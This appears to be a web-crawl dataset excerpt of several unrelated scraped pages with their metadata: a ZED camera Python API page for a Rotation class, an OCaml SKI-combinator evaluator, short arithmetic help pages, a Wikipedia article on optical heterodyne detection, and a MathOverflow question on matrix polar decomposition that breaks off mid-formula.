{"ft_lang_label":"__label__en","ft_lang_prob":0.8749511,"math_prob":0.93137395,"size":6276,"snap":"2023-14-2023-23","text_gpt3_token_len":1509,"char_repetition_ratio":0.20902424,"word_repetition_ratio":0.059880238,"special_character_ratio":0.26210964,"punctuation_ratio":0.14125201,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98449725,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,7,null,7,null,7,null,7,null,7,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-08T10:46:57Z\",\"WARC-Record-ID\":\"<urn:uuid:f5afb209-ca6f-4734-afdb-148089e26899>\",\"Content-Length\":\"46047\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:749559cb-1825-4d1a-8d6d-a32acadf69c0>\",\"WARC-Concurrent-To\":\"<urn:uuid:07f65295-de01-4799-b5ce-40d9b317583a>\",\"WARC-IP-Address\":\"52.38.47.176\",\"WARC-Target-URI\":\"https://www.ozassignments.com/solution/bit110-business-mathematics-and-statistics-paper-editing-service\",\"WARC-Payload-Digest\":\"sha1:JXXUEDF5TSY7P27NYGAHTL4IP77DZIE2\",\"WARC-Block-Digest\":\"sha1:AWONPX7YLV6JJGKYEU7QZHN63AYF6FBF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224654871.97_warc_CC-MAIN-20230608103815-20230608133815-00531.warc.gz\"}"}
https://www.stereolabs.com/docs/api/python/classpyzed_1_1sl_1_1Rotation.html
[ "", null, "DOCUMENTATION SAMPLES API REFERENCE SUPPORT DOWNLOADS", null, "C++ Python C# C\nRotation Class Reference\n\nDesigned to contain rotation data of the positional tracking. More...\n\n## Functions\n\ndef init_rotation (self, Rotation rot)\nDeep copy from another Rotation . More...\n\ndef init_matrix (self, Matrix3f matrix)\nInits the Rotation from a Matrix3f . More...\n\ndef init_orientation (self, Orientation orient)\nInits the Rotation from a Orientation . More...\n\ndef init_angle_translation (self, float angle, Translation axis)\nInits the Rotation from an angle and an arbitrary 3D axis. More...\n\ndef set_orientation (self, Orientation py_orientation)\nSets the Rotation from an Orientation . More...\n\ndef get_orientation (self)\nReturns the Orientation corresponding to the current Rotation . More...\n\ndef get_rotation_vector (self)\nReturns the 3x1 rotation vector obtained from 3x3 rotation matrix using Rodrigues formula. More...\n\ndef set_rotation_vector (self, float input0, float input1, float input2)\nSets the Rotation from a rotation vector (using Rodrigues' transformation). More...\n\nConverts the Rotation as Euler angles. More...\n\ndef set_euler_angles (self, float input0, float input1, float input2, radian=True)\nSets the Rotation from the Euler angles. More...\n\ndef inverse (self)\nInverses the matrix.\n\ndef inverse_mat (self, Matrix3f rotation)\nInverses the Matrix3f passed as a parameter. More...\n\ndef transpose (self)\nSets the Matrix3f to its transpose.\n\ndef transpose_mat (self, Matrix3f rotation)\nReturns the transpose of a Matrix3f. More...\n\ndef set_identity (self)\nSets the Matrix3f to identity. More...\n\ndef identity (self)\nCreates an identity Matrix3f. More...\n\ndef set_zeros (self)\nSets the Matrix3f to zero.\n\ndef zeros (self)\nCreates a Matrix3f filled with zeros. More...\n\ndef get_infos (self)\nReturns the components of the Matrix3f in a string. More...\n\ndef matrix_name (self)\nName of the matrix (optional).\n\ndef r (self)\nNumpy array of inner data.\n\n## Detailed Description\n\nDesigned to contain rotation data of the positional tracking.\n\nIt inherits from the generic Matrix3f .\n\n## ◆ init_rotation()\n\n def init_rotation ( self, Rotation rot )\n\nDeep copy from another Rotation .\n\nParameters\n rot : Rotation to be copied.\n\n## ◆ init_matrix()\n\n def init_matrix ( self, Matrix3f matrix )\n\nInits the Rotation from a Matrix3f .\n\nParameters\n matrix : Matrix3f to be used.\n\nReimplemented from Matrix3f.\n\n## ◆ init_orientation()\n\n def init_orientation ( self, Orientation orient )\n\nInits the Rotation from a Orientation .\n\nParameters\n orient : Orientation to be used.\n\n## ◆ init_angle_translation()\n\n def init_angle_translation ( self, float angle, Translation axis )\n\nInits the Rotation from an angle and an arbitrary 3D axis.\n\nParameters\n angle : The rotation angle in rad. axis : the 3D axis (Translation) to rotate around\n\n## ◆ set_orientation()\n\n def set_orientation ( self, Orientation py_orientation )\n\nSets the Rotation from an Orientation .\n\nParameters\n py_orientation : the Orientation containing the rotation to set.\n\n## ◆ get_orientation()\n\n def get_orientation ( self )\n\nReturns the Orientation corresponding to the current Rotation .\n\nReturns\nThe orientation of the current rotation.\n\n## ◆ get_rotation_vector()\n\n def get_rotation_vector ( self )\n\nReturns the 3x1 rotation vector obtained from 3x3 rotation matrix using Rodrigues formula.\n\nReturns\nThe rotation vector (numpy array)\n\n## ◆ set_rotation_vector()\n\n def set_rotation_vector ( self, float input0, float input1, float input2 )\n\nSets the Rotation from a rotation vector (using Rodrigues' transformation).\n\nParameters\n input0 : First float value input1 : Second float value input2 : Third float value\n\n## ◆ get_euler_angles()\n\n def get_euler_angles ( self, radian = `True` )\n\nConverts the Rotation as Euler angles.\n\nParameters\n radian : Bool to define whether the angle in is radian (True) or degree (False). Default: True\nReturns\nThe Euler angles, as a numpy array representing the rotations arround the X, Y and Z axes.\n\n## ◆ set_euler_angles()\n\n def set_euler_angles ( self, float input0, float input1, float input2, radian = `True` )\n\nSets the Rotation from the Euler angles.\n\nParameters\n input0 : Roll value input1 : Pitch value input2 : Yaw value radian : Bool to define whether the angle in is radian (True) or degree (False). Default: True\n\n## ◆ inverse_mat()\n\n def inverse_mat ( self, Matrix3f rotation )\ninherited\n\nInverses the Matrix3f passed as a parameter.\n\nParameters\n rotation : the Matrix3f to inverse\nReturns\nthe inversed Matrix3f\n\n## ◆ transpose_mat()\n\n def transpose_mat ( self, Matrix3f rotation )\ninherited\n\nReturns the transpose of a Matrix3f.\n\nParameters\n rotation : the Matrix3f to compute the transpose from.\nReturns\nThe transpose of the given Matrix3f\n\n## ◆ set_identity()\n\n def set_identity ( self )\ninherited\n\nSets the Matrix3f to identity.\n\nReturns\nitself\n\n## ◆ identity()\n\n def identity ( self )\ninherited\n\nCreates an identity Matrix3f.\n\nReturns\na Matrix3f set to identity\n\n## ◆ zeros()\n\n def zeros ( self )\ninherited\n\nCreates a Matrix3f filled with zeros.\n\nReturns\nA Matrix3f filled with zeros\n\n## ◆ get_infos()\n\n def get_infos ( self )\ninherited\n\nReturns the components of the Matrix3f in a string.\n\nReturns\nA string containing the components of the current of Matrix3f\n\nReferenced by Matrix4f.m(), and Mat.verbose()." ]
[ null, "https://www.stereolabs.com/img/logo_stereolabs.svg", null, "https://www.stereolabs.com/docs/api/python/search/mag_sel.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5184017,"math_prob":0.8885368,"size":3811,"snap":"2022-40-2023-06","text_gpt3_token_len":1048,"char_repetition_ratio":0.22195955,"word_repetition_ratio":0.23034735,"special_character_ratio":0.2686959,"punctuation_ratio":0.2139535,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98989815,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-03T13:27:24Z\",\"WARC-Record-ID\":\"<urn:uuid:280c8320-353b-49b1-bf5b-ad7c22009011>\",\"Content-Length\":\"45169\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:75787593-dbeb-43f7-9a7a-8b6a6bfd9845>\",\"WARC-Concurrent-To\":\"<urn:uuid:031870cc-6676-489b-95f2-2e9b992c6f38>\",\"WARC-IP-Address\":\"199.16.130.189\",\"WARC-Target-URI\":\"https://www.stereolabs.com/docs/api/python/classpyzed_1_1sl_1_1Rotation.html\",\"WARC-Payload-Digest\":\"sha1:FU75VFSZUCINGV7LZMGQSFK4BA2ZGCUB\",\"WARC-Block-Digest\":\"sha1:ON6SVPHDGP2XIMD44TQN2LIHECC2VZIN\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500056.55_warc_CC-MAIN-20230203122526-20230203152526-00145.warc.gz\"}"}
http://lambda.jimpryor.net/git/gitweb.cgi?p=lambda.git;a=blob;f=code/ski_evaluator.ml;h=15ee4a7766818dc84a551648da8b016897fd5da7;hb=7ea03edf218ad5b63cd7ee0faa33391e1f3893ae
[ "1 type term = I | S | K | App of (term * term)\n3 let skomega = App (App (App (S,I), I), App (App (S,I), I))\n4 let test = App (App (K,I), skomega)\n6 let reduce_if_redex (t:term):term = match t with\n7   | App(I,a) -> a\n8   | App(App(K,a),b) -> a\n9   | App(App(App(S,a),b),c) -> App(App(a,c),App(b,c))\n10   | _ -> t\n12 let is_redex (t:term):bool = not (t = reduce_if_redex t)\n14 let rec reduce_try2 (t:term):term = match t with\n15   | I -> I\n16   | K -> K\n17   | S -> S\n18   | App (a, b) ->\n19       let t' = App (reduce_try2 a, reduce_try2 b) in\n20       if (is_redex t') then let t'' = reduce_if_redex t'\n21                             in reduce_try2 t''\n22                        else t'\n24 let rec reduce_lazy (t:term):term = match t with\n25   | I -> I\n26   | K -> K\n27   | S -> S\n28   | App (a, b) ->\n29       let t' = App (reduce_lazy a, b) in\n30       if (is_redex t') then let t'' = reduce_if_redex t'\n31                             in reduce_lazt t''\n32                        else t'" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6434666,"math_prob":0.97971106,"size":609,"snap":"2019-26-2019-30","text_gpt3_token_len":222,"char_repetition_ratio":0.19669421,"word_repetition_ratio":0.116071425,"special_character_ratio":0.41215107,"punctuation_ratio":0.15972222,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9858141,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-23T21:58:27Z\",\"WARC-Record-ID\":\"<urn:uuid:46cf2bb4-38f3-413f-a58e-258e500c9f53>\",\"Content-Length\":\"14495\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9c249fd3-0c5c-4dc0-9338-cb43042d91fd>\",\"WARC-Concurrent-To\":\"<urn:uuid:67937391-e94d-4036-8feb-2e6c61352c93>\",\"WARC-IP-Address\":\"45.79.164.50\",\"WARC-Target-URI\":\"http://lambda.jimpryor.net/git/gitweb.cgi?p=lambda.git;a=blob;f=code/ski_evaluator.ml;h=15ee4a7766818dc84a551648da8b016897fd5da7;hb=7ea03edf218ad5b63cd7ee0faa33391e1f3893ae\",\"WARC-Payload-Digest\":\"sha1:EC4MEPS62EBHPQH57XPUJ6AKVODKBP7N\",\"WARC-Block-Digest\":\"sha1:XH4STBEW6EFXONDAOUITJOMMHH7JFVPN\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195529737.79_warc_CC-MAIN-20190723215340-20190724001340-00016.warc.gz\"}"}
https://www.grimesmathematics.com/b/how-to-multiply-decimals
[ "# How to Multiply Decimals\n\nSo we all know how to multiply whole numbers. But do we all know how to multiply decimals without using a calculator?\n\nThis short video shows how to multiply decimals in very easy to follow steps.\n\n0 0\nFeed" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.78870845,"math_prob":0.9899298,"size":282,"snap":"2020-24-2020-29","text_gpt3_token_len":65,"char_repetition_ratio":0.17266187,"word_repetition_ratio":0.08695652,"special_character_ratio":0.22340426,"punctuation_ratio":0.054545455,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9900775,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-14T18:16:36Z\",\"WARC-Record-ID\":\"<urn:uuid:17d8f0da-945d-432e-9ef2-c517187bc054>\",\"Content-Length\":\"54433\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:274a6d32-c5e7-49e2-b86e-ae96cd5d406e>\",\"WARC-Concurrent-To\":\"<urn:uuid:2e935728-168d-4168-9a4d-1f74450ec460>\",\"WARC-IP-Address\":\"185.58.213.107\",\"WARC-Target-URI\":\"https://www.grimesmathematics.com/b/how-to-multiply-decimals\",\"WARC-Payload-Digest\":\"sha1:IUFCO5QHMTNBQ6EETXNL6JFGFZ32ARKT\",\"WARC-Block-Digest\":\"sha1:WD5RNHE7VHH6GL7J4LHQBZW6BEG26THO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657151197.83_warc_CC-MAIN-20200714181325-20200714211325-00365.warc.gz\"}"}
https://answers.everydaycalculation.com/add-fractions/9-49-plus-8-90
[ "Solutions by everydaycalculation.com\n\n9/49 + 8/90 is 601/2205.\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 49 and 90 is 4410\n2. For the 1st fraction, since 49 × 90 = 4410,\n9/49 = 9 × 90/49 × 90 = 810/4410\n3. Likewise, for the 2nd fraction, since 90 × 49 = 4410,\n8/90 = 8 × 49/90 × 49 = 392/4410\n810/4410 + 392/4410 = 810 + 392/4410 = 1202/4410\n5. 1202/4410 simplified gives 601/2205\n6. So, 9/49 + 8/90 = 601/2205\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7665757,"math_prob":0.9908061,"size":316,"snap":"2020-45-2020-50","text_gpt3_token_len":125,"char_repetition_ratio":0.17307693,"word_repetition_ratio":0.0,"special_character_ratio":0.48101267,"punctuation_ratio":0.06849315,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99842036,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-25T17:42:34Z\",\"WARC-Record-ID\":\"<urn:uuid:88bacfc5-7696-495f-9cb9-9142d62fd731>\",\"Content-Length\":\"7797\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4902e74b-95a4-45ce-b173-4909e0b86c6e>\",\"WARC-Concurrent-To\":\"<urn:uuid:35981d69-b1ca-4ac6-8c34-197ab5bc603f>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/add-fractions/9-49-plus-8-90\",\"WARC-Payload-Digest\":\"sha1:CFRXKPFFLY3KQ23TAJ54MXDWHSNYI4WC\",\"WARC-Block-Digest\":\"sha1:CF7BCLFGCB3XCGKUKFHZLTBA2KBAEYQG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141183514.25_warc_CC-MAIN-20201125154647-20201125184647-00418.warc.gz\"}"}
https://en.m.wikipedia.org/wiki/Synthetic_array_heterodyne_detection
[ "Optical heterodyne detection\n\n(Redirected from Synthetic array heterodyne detection)\n\nOptical heterodyne detection is a method of extracting information encoded as modulation of the phase, frequency or both of electromagnetic radiation in the wavelength band of visible or infrared light. The light signal is compared with standard or reference light from a \"local oscillator\" (LO) that would have a fixed offset in frequency and phase from the signal if the latter carried null information. \"Heterodyne\" signifies more than one frequency, in contrast to the single frequency employed in homodyne detection.\n\nThe comparison of the two light signals is typically accomplished by combining them in a photodiode detector, which has a response that is linear in energy, and hence quadratic in amplitude of electromagnetic field. Typically, the two light frequencies are similar enough that their difference or beat frequency produced by the detector is in the radio or microwave band that can be conveniently processed by electronic means.\n\nThis technique became widely applicable to topographical and velocity-sensitive imaging with the invention in the 1990s of synthetic array heterodyne detection. The light reflected from a target scene is focussed on a relatively inexpensive photodetector consisting of a single large physical pixel, while a different LO frequency is also tightly focussed on each virtual pixel of this detector, resulting in an electrical signal from the detector carrying a mixture of beat frequencies that can be electronically isolated and distributed spatially to present an image of the scene.\n\nHistory\n\nOptical heterodyne detection began to be studied at least as early as 1962, within two years of the construction of the first laser.\n\nContrast to conventional radio frequency (RF) heterodyne detection\n\nIt is instructive to contrast the practical aspects of optical band detection to Radio Frequency (RF) band heterodyne detection.\n\nEnergy versus electric field detection\n\nUnlike RF band detection, optical frequencies oscillate too rapidly to directly measure and process the electric field electronically. Instead optical photons are (usually) detected by absorbing the photon's energy, thus only revealing the magnitude, and not by following the electric field phase. Hence the primary purpose of heterodyne mixing is to down shift the signal from the optical band to an electronically tractable frequency range.\n\nIn RF band detection, typically, the electromagnetic field drives oscillatory motion of electrons in an antenna; the captured EMF is subsequently electronically mixed with a local oscillator (LO) by any convenient non-linear circuit element with a quadratic term (most commonly a rectifier). In optical detection, the desired non-linearity is inherent in the photon absorption process itself. Conventional light detectors—so called \"Square-law detectors\"—respond to the photon energy to free bound electrons, and since the energy flux scales as the square of the electric field, so does the rate at which electrons are freed. A difference frequency only appears in the detector output current when both the LO and signal illuminate the detector at the same time, causing the square of their combined fields to have a cross term or \"difference\" frequency modulating the average rate at which free electrons are generated.\n\nWideband local oscillators for coherent detection\n\nAnother point of contrast is the expected bandwidth of the signal and local oscillator. Typically, an RF local oscillator is a pure frequency; pragmatically, \"purity\" means that a local oscillator's frequency bandwidth is much much less than the difference frequency. With optical signals, even with a laser, it is not simple to produce a reference frequency sufficiently pure to have either an instantaneous bandwidth or long term temporal stability that is less than a typical megahertz or kilohertz scale difference frequency. For this reason, the same source is often used to produce the LO and the signal so that their difference frequency can be kept constant even if the center frequency wanders.\n\nAs a result, the mathematics of squaring the sum of two pure tones, normally invoked to explain RF heterodyne detection, is an oversimplified model of optical heterodyne detection. Nevertheless, the intuitive pure-frequency heterodyne concept still holds perfectly for the wideband case provided that the signal and LO are mutually coherent. Crucially, one can obtain narrow-band interference from coherent broadband sources: this is the basis for white light interferometry and optical coherence tomography. Mutual coherence permits the rainbow in Newton's rings, and supernumerary rainbows.\n\nConsequently, optical heterodyne detection is usually performed as interferometry where the LO and signal share a common origin, rather than, as in radio, a transmitter sending to a remote receiver. The remote receiver geometry is uncommon because generating a local oscillator signal that is coherent with a signal of independent origin is technologically difficult at optical frequencies. However, lasers of sufficiently narrow linewidth to allow the signal and LO to originate from different lasers do exist.\n\nPhoton Counting\n\nAfter optical heterodyne became an established technique, consideration was given to the conceptual basis for operation at such low signal light levels that \"only a few, or even fractions of, photons enter the receiver in a characteristic time interval\". It was concluded that even when photons of different energies are absorbed at a countable rate by a detector at different (random) times, the detector can still produce a difference frequency. Hence light seems to have wave-like properties not only as it propagates through space, but also when it interacts with matter. Progress with photon counting was such that by 2008 it was proposed that, even with larger signal strengths available, it could be advantageous to employ local oscillator power low enough to allow detection of the beat signal by photon counting. This was understood to have a main advantage of imaging with available and rapidly developing large-format multi-pixel counting photodetectors.\n\nPhoton counting was applied with frequency-modulated continuous wave (FMCW) lasers. Numerical algorithms were developed to optimize the statistical performance of the analysis of the data from photon counting.\n\nKey benefits\n\nGain in the detection\n\nThe amplitude of the down-mixed difference frequency can be larger than the amplitude of the original signal itself. The difference frequency signal is proportional to the product of the amplitudes of the LO and signal electric fields. Thus the larger the LO amplitude, the larger the difference-frequency amplitude. Hence there is gain in the photon conversion process itself.\n\n$I\\propto \\left[E_{\\mathrm {sig} }\\cos(\\omega _{\\mathrm {sig} }t+\\varphi )+E_{\\mathrm {LO} }\\cos(\\omega _{\\mathrm {LO} }t)\\right]^{2}\\propto {\\frac {1}{2}}E_{\\mathrm {sig} }^{2}+{\\frac {1}{2}}E_{\\mathrm {LO} }^{2}+2E_{\\mathrm {LO} }E_{\\mathrm {sig} }\\cos(\\omega _{\\mathrm {sig} }t+\\varphi )\\cos(\\omega _{\\mathrm {LO} }t)$\n\nThe first two terms are proportional to the average (DC) energy flux absorbed (or, equivalently, the average current in the case of photon counting). The third term is time varying and creates the sum and difference frequencies. In the optical regime the sum frequency will be too high to pass through the subsequent electronics. In many applications the signal is weaker than the LO, thus it can be seen that gain occurs because the energy flux in the difference frequency $E_{\\mathrm {LO} }E_{\\mathrm {sig} }$  is greater than the DC energy flux of the signal by itself $E_{\\mathrm {sig} }^{2}$ .\n\nPreservation of optical phase\n\nBy itself, the signal beam's energy flux, $E_{\\mathrm {sig} }^{2}$ , is DC and thus erases the phase associated with its optical frequency; Heterodyne detection allows this phase to be detected. If the optical phase of the signal beam shifts by an angle phi, then the phase of the electronic difference frequency shifts by exactly the same angle phi. More properly, to discuss an optical phase shift one needs to have a common time base reference. Typically the signal beam is derived from the same laser as the LO but shifted by some modulator in frequency. In other cases, the frequency shift may arise from reflection from a moving object. As long as the modulation source maintains a constant offset phase between the LO and signal source, any added optical phase shifts over time arising from external modification of the return signal are added to the phase of the difference frequency and thus are measurable.\n\nMapping optical frequencies to electronic frequencies allows sensitive measurements\n\nAs noted above, the difference frequency linewidth can be much smaller than the optical linewidth of the signal and LO signal, provided the two are mutually coherent. Thus small shifts in optical signal center-frequency can be measured: For example, Doppler lidar systems can discriminate wind velocities with a resolution better than 1 meter per second, which is less than a part in a billion Doppler shift in the optical frequency. Likewise small coherent phase shifts can be measured even for nominally incoherent broadband light, allowing optical coherence tomography to image micrometer-sized features. Because of this, an electronic filter can define an effective optical frequency bandpass that is narrower than any realizable wavelength filter operating on the light itself, and thereby enable background light rejection and hence the detection of weak signals.\n\nNoise reduction to shot noise limit\n\nAs with any small signal amplification, it is most desirable to get gain as close as possible to the initial point of the signal interception: moving the gain ahead of any signal processing reduces the additive contributions of effects like resistor Johnson–Nyquist noise, or electrical noises in active circuits. In optical heterodyne detection, the mixing-gain happens directly in the physics of the initial photon absorption event, making this ideal. Additionally, to a first approximation, absorption is perfectly quadratic, in contrast to RF detection by a diode non-linearity.\n\nOne of the virtues of heterodyne detection is that the difference frequency is generally far removed spectrally from the potential noises radiated during the process of generating either the signal or the LO signal, thus the spectral region near the difference frequency may be relatively quiet. Hence, narrow electronic filtering near the difference frequency is highly effective at removing the remaining, generally broadband, noise sources.\n\nThe primary remaining source of noise is photon shot noise from the nominally constant DC level, which is typically dominated by the Local Oscillator (LO). Since the shot noise scales as the amplitude of the LO electric field level, and the heterodyne gain also scales the same way, the ratio of the shot noise to the mixed signal is constant no matter how large the LO.\n\nThus in practice one increases the LO level, until the gain on the signal raises it above all other additive noise sources, leaving only the shot noise. In this limit, the signal to noise ratio is affected by the shot noise of the signal only (i.e. there is no noise contribution from the powerful LO because it divided out of the ratio). At that point there is no change in the signal to noise as the gain is raised further. (Of course, this is a highly idealized description; practical limits on the LO intensity matter in real detectors and an impure LO might carry some noise at the difference frequency)\n\nKey problems and their solutions\n\nArray detection and imaging\n\nArray detection of light, i.e. detecting light in a large number of independent detector pixels, is common in digital camera image sensors. However, it tends to be quite difficult in heterodyne detection, since the signal of interest is oscillating (also called AC by analogy to circuits), often at millions of cycles per second or more. At the typical frame rates for image sensors, which are much slower, each pixel would integrate the total light received over many oscillation cycles, and this time-integration would destroy the signal of interest. Thus a heterodyne array must usually have parallel direct connections from every sensor pixel to separate electrical amplifiers, filters, and processing systems. This makes large, general purpose, heterodyne imaging systems prohibitively expensive. For example, simply attaching 1 million leads to a megapixel coherent array is a daunting challenge.\n\nTo solve this problem, synthetic array heterodyne detection (SAHD) was developed. In SAHD, large imaging arrays can be multiplexed into virtual pixels on a single element detector with single readout lead, single electrical filter, and single recording system. The time domain conjugate of this approach is Fourier transform heterodyne detection, which also has the multiplex advantage and also allows a single element detector to act like an imaging array. SAHD has been implemented as Rainbow heterodyne detection in which instead of a single frequency LO, many narrowly spaced frequencies are spread out across the detector element surface like a rainbow. The physical position where each photon arrived is encoded in the resulting difference frequency itself, making a virtual 1D array on a single element detector. If the frequency comb is evenly spaced then, conveniently, the Fourier transform of the output waveform is the image itself. Arrays in 2D can be created as well, and since the arrays are virtual, the number of pixels, their size, and their individual gains can be adapted dynamically. The multiplex disadvantage is that the shot noise from all the pixels combine since they are not physically separated.\n\nSpeckle and diversity reception\n\nAs discussed, the LO and signal must be temporally coherent. They also need to be spatially coherent across the face of the detector or they will destructively interfere. In many usage scenarios the signal is reflected from optically rough surfaces or passes through optically turbulent media leading to wavefronts that are spatially incoherent. In laser scattering this is known as speckle.\n\nIn RF detection the antenna is rarely larger than the wavelength so all excited electrons move coherently within the antenna, whereas in optics the detector is usually much larger than the wavelength and thus can intercept a distorted phase front, resulting in destructive interference by out-of-phase photo-generated electrons within the detector.\n\nWhile destructive interference dramatically reduces the signal level, the summed amplitude of a spatially incoherent mixture does not approach zero but rather the mean amplitude of a single speckle. However, since the standard deviation of the coherent sum of the speckles is exactly equal to the mean speckle intensity, optical heterodyne detection of scrambled phase fronts can never measure the absolute light level with an error bar less than the size of the signal itself. This upper bound signal-to-noise ratio of unity is only for absolute magnitude measurement: it can have signal-to-noise ratio better than unity for phase, frequency or time-varying relative-amplitude measurements in a stationary speckle field.\n\nIn RF detection, \"diversity reception\" is often used to mitigate low signals when the primary antenna is inadvertently located at an interference null point: by having more than one antenna one can adaptively switch to whichever antenna has the strongest signal or even incoherently add all of the antenna signals. Simply adding the antennae coherently can produce destructive interference just as happens in the optical realm.\n\nThe analogous diversity reception for optical heterodyne has been demonstrated with arrays of photon-counting detectors. For incoherent addition of the multiple element detectors in a random speckle field, the ratio of the mean to the standard deviation will scale as the square root of the number of independently measured speckles. This improved signal-to-noise ratio makes absolute amplitude measurements feasible in heterodyne detection.\n\nHowever, as noted above, scaling physical arrays to large element counts is challenging for heterodyne detection due to the oscillating or even multi-frequency nature of the output signal. Instead, a single-element optical detector can also act like diversity receiver via synthetic array heterodyne detection or Fourier transform heterodyne detection. With a virtual array one can then either adaptively select just one of the LO frequencies, track a slowly moving bright speckle, or add them all in post-processing by the electronics.\n\nCoherent temporal summation\n\nOne can incoherently add the magnitudes of a time series of N independent pulses to obtain a N improvement in the signal to noise on the amplitude, but at the expense of losing the phase information. Instead coherent addition (adding the complex magnitude and phase) of multiple pulse waveforms would improve the signal to noise by a factor of N, not its square root, and preserve the phase information. The practical limitation is adjacent pulses from typical lasers have a minute frequency drift that translates to a large random phase shift in any long distance return signal, and thus just like the case for spatially scrambled-phase pixels, destructively interfere when added coherently. However, coherent addition of multiple pulses is possible with advanced laser systems that narrow the frequency drift far below the difference frequency (intermediate frequency). This technique has been demonstrated in multi-pulse coherent Doppler LIDAR." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8886249,"math_prob":0.9381049,"size":21553,"snap":"2019-26-2019-30","text_gpt3_token_len":4684,"char_repetition_ratio":0.16344146,"word_repetition_ratio":0.0025054808,"special_character_ratio":0.21570083,"punctuation_ratio":0.13706763,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9519675,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-27T06:14:20Z\",\"WARC-Record-ID\":\"<urn:uuid:3acc85ae-b359-4892-9cfc-9f440ee31642>\",\"Content-Length\":\"85861\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6a6f6a1e-f42b-4e71-84e5-fbf5e5d55235>\",\"WARC-Concurrent-To\":\"<urn:uuid:5a688375-4fab-4e99-b203-b5705d3eead7>\",\"WARC-IP-Address\":\"208.80.154.224\",\"WARC-Target-URI\":\"https://en.m.wikipedia.org/wiki/Synthetic_array_heterodyne_detection\",\"WARC-Payload-Digest\":\"sha1:BJZUX7OJ2VOJN7L4DVKOSHWMQOENELRU\",\"WARC-Block-Digest\":\"sha1:AKC2F5BBOZBJ6MXIHJYY4O3V4DSORSY6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560628000894.72_warc_CC-MAIN-20190627055431-20190627081431-00196.warc.gz\"}"}
https://mathoverflow.net/questions/312704/generalizing-polar-decomposition-of-matrices
[ "Generalizing Polar Decomposition of Matrices\n\nI am trying to find a certain proof of polar decomposition of complex matrices which I think should exist more generally for a certain class of Lie groups. Recall that the polar decomposition of a nonsingular complex matrix $$A \\in \\text{GL}_n(\\mathbb{C})$$ is an expression $$A = UP$$, where $$U \\in \\text{GL}_n(\\mathbb{C})$$ is unitary and $$P \\in \\text{GL}_n(\\mathbb{C})$$ is positive definite.\n\nMy attempt arises with a well known analogy between four classes of matrices and four sets of complex numbers:\n\n$$\\begin{array}{|c|c|} \\hline \\text{Subset of }\\text{Mat}_{n \\times n } (\\mathbb{C}) & \\text{Corresponding set in } \\mathbb{C} \\text{ } \\\\ \\hline \\text{Hermitian matrices} & \\text{Real numbers}\\\\ \\hline \\text{Skew-Hermitian matrices} & \\text{Imaginary numbers} \\\\ \\hline \\text{Hermitian positive definite matrices} & \\text{Positive real numbers} \\\\ \\hline \\text{Unitary matrices} & \\text{The unit circle in } \\mathbb{C}\\\\ \\hline \\end{array}$$\n\nThe analogy is justified through the observation that each set of matrices in the left column is precisely the set of unitarily diagonalizable matrices with eigenvalues in the corresponding set on the right. Moreover, the exponential map of matrices sends hermitian matrices to positive definite matrices and skew-hermitian to unitary matrices, a further similarity.\n\nIn showing polar decomposition, we take from the case for $$\\mathbb{C}$$; $$\\text{exp} : \\mathbb{C} \\rightarrow \\mathbb{C}^*$$ sends the reals to the positive reals, and imaginary numbers to the unit circle. Taking $$\\text{exp}$$ of $$z = \\text{Re}(z) + i \\ 